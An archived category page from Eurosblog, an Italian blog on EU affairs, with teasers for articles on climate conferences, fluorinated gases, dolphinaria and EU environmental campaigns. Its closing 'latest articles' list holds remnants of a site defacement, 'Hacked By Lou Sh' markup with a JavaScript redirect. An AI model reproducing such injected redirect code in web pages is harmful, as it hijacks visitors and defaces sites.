EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
clima

clima


clima

it

Sembra che le decisioni diplomatiche internazionali siano più lente dei cambiamenti climatici. Sedici COP dopo la terza, la storica Conferenza di Kyoto, esperti, tecnici, diplomatici e politici da tutto il mondo si sono riuniti a Varsavia per discutere di riscaldamento globale. Nessun accordo rilevante è stato raggiunto. Tutti sanno però quando e dove rivedersi per la ventesima Conferenza sul clima.

Nella storia della diplomazia internazionale, piena di summit e incontri nati con i migliori auspici, spesso accade che le buone intenzioni si trasformino, di fatto, in grandi delusioni. La storia del Protocollo di Kyoto, i cui esiti sono inferiori alle aspettative, non è un’eccezione.

Kyoto, (...)

it

Dopo cinque tappe in altrettante città d'Italia, il 7 giugno i dialoghi con i cittadini dei commissari UE approdano a Milano. Ospite d'onore la Commissaria responsabile dell'Azione per il clima, Connie Hedegaard. Al centro dell'incontro con un'ampia rappresentanza di cittadini vi saranno temi quali lo sviluppo sostenibile, la maniera per conservare e valorizzare il clima del pianeta, la lotta e l'adattamento ai cambiamenti climatici (sia tramite le decisioni politiche che attraverso le nostre scelte quotidiane).

Il dibattito, organizzato dalla Commissione europea in occasione dell’Anno europeo dei cittadini, si svolgerà a partire dalle ore 11:00 a Palazzo Marino e vedrà la partecipazione del Sindaco di Milano Giuliano Pisapia. A moderare Federico Taddia – giornalista, scrittore, conduttore e autore (...)

it

Ridurre in misura significativa le emissioni di gas fluorurati. È questa la proposta di regolamento presentata, lo scorso 7 novembre a Bruxelles, dalla Commissione europea e avente come obiettivo quello di ridurre di 2/3 - entro il 2030 - il livello di emissione di questi gas, aumentate del 60% dal 1990 a oggi. Solo così sarà finalmente possibile combattere il riscaldamento globale.

Cosa sono i gas fluorurati?I gas fluorurati rientrano nella categoria dei gas serra, quei gas cioè presenti nell’atmosfera e che, pur essendo trasparenti alla radiazione solare in entrata sulla Terra, “riescono a trattenere, in maniera consistente, la radiazione infrarossa emessa dalla superficie (...)

it

I titolari di diverse Direzioni Generali dell'Unione europea dimostrano che l'attuazione di una politica energetica basata su fonti rinnovabili è possibile soprattutto in un periodo di crisi economica. Viene così spezzata la correlazione tra sfruttamento delle risorse naturali ed aumento dei costi.

La politica ambientale promossa dall’Unione europea include questioni che riguardano da vicino i cittadini. Essa presenta ripercussioni globali e strategiche, perciò necessita della collaborazione da parte dei titolari di alcune delle più importanti Direzioni Generali dell’esecutivo europeo. (...)

it

Sono ben 34 i delfinari presenti in 14 Paesi dell’Unione europea a rischiare la chiusura. A stabilirlo è il rapporto della WDCS - Whale and Dolphin Conservation Society (Società per la conservazione di balene e delfini), realizzato per conto della coalizione europea ENDCAP in collaborazione con la “Born Free Foundation” e recentemente presentato al Parlamento Europeo.

Belgio, Bulgaria, Danimarca, Finlandia, Francia, Germania, Grecia, Italia, Lituania, Malta, Olanda, Portogallo, Spagna e Svezia. Sono questi i 14 Paesi europei finiti nel mirino della WDCS, un’organizzazione che dal 1987 si batte per la conservazione e il benessere di tutti i cetacei, grazie (...)

it

Earth Day e Earth Hour, due eventi a “impatto zero” che coinvolgono già da diversi anni varie nazioni in tutto il mondo con lo scopo di sensibilizzare gli abitanti del nostro pianeta al tema dell’eco sostenibilità

Earth Day e Earth Day Italia:

L’Earth Day è un evento che vede partecipare insieme 170 paesi di tutto il mondo che collaborativamente si preoccupano di garantire un futuro sostenibile al pianeta e ai suoi abitanti. Il vero problema a cui tali paesi cercano di trovare rimedio è la mancanza di beni (...)

it

“Consumare di meno per produrre di più”, ecco il motto di “Generation Awake: le tue scelte fanno un mondo di differenza!”, la campagna di sensibilizzazione lanciata nell’Ottobre 2011 dall’Unione Europea per incoraggiare i consumatori a trasformare in un comportamento abitudinario l’utilizzo efficace delle risorse. In tempi di crisi come quelli che stiamo attraversando, consumare in modo razionale e riflettere prima di scegliere possono rappresentare le giuste condizioni per contribuire a conservare le risorse naturali, a risparmiare, a ridurre il nostro impatto sull'ambiente e a garantire un futuro più sostenibile.

Si tratta di una campagna innovativa inaugurata in Polonia dal Commissario europeo per l’Ambiente, Janez Potocnick, e da Andrzej Kraszewski, Ministro polacco dell’Ambiente, la quale si avvale di un videoclip di grande diffusione su Internet, un sito web multilingue dedicato al tema (...)

it

Secondo la sentenza della Corte europea di giustizia la Commissione non può fissare quantità annue massime per la riduzione delle emissioni di gas serra, come invece avvenuto nel 2007 nei confronti di Polonia e Estonia

Se da un lato alcuni Stati membri tirano un sospiro di sollievo, dall’altro la Commissione incassa un duro colpo, anzi due. Perchè la Corte europea di giustizia oltre a respingere la richiesta da parte della Commissione di annullamento della precedente sentenza del 2009, ha poi stabilito come in (...)

it

Il gigante rosso fa sul serio: boicotta gli aerei del gruppo europeo, ma l’UE promette di resistere. Ora il rischio è di una guerra commerciale che come al solito penalizzerà soprattutto chi sceglierà di viaggiare in alta quota

Più che la primavera, sembra essere agli inizi di una stagione molto fredda, ricca di crisi diplomatiche internazionali. In principio fu l’India, l’altro colosso asiatico, che con l’Italia ha ingaggiato un durissimo braccio di ferro sulla questione dei due fucilieri della Marina. Dopo un’iniziale (...)

it

Il nostro paese ha rifiutato la proposta dell'UE a causa della qualità del suo petrolio, ritenuto uno dei più "sporchi" in assoluto.

La Fuel Quality Directive è nata nel 2009 ed ha come obiettivo quello di ridurre di almeno il 6% le emissioni derivanti dall’uso di combustibili entro il 2020. Questa nuova estensione, varata il 23 Febbraio 2012, avrebbe voluto interrompere l’utilizzo di combustibili che derivano da estrazioni (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France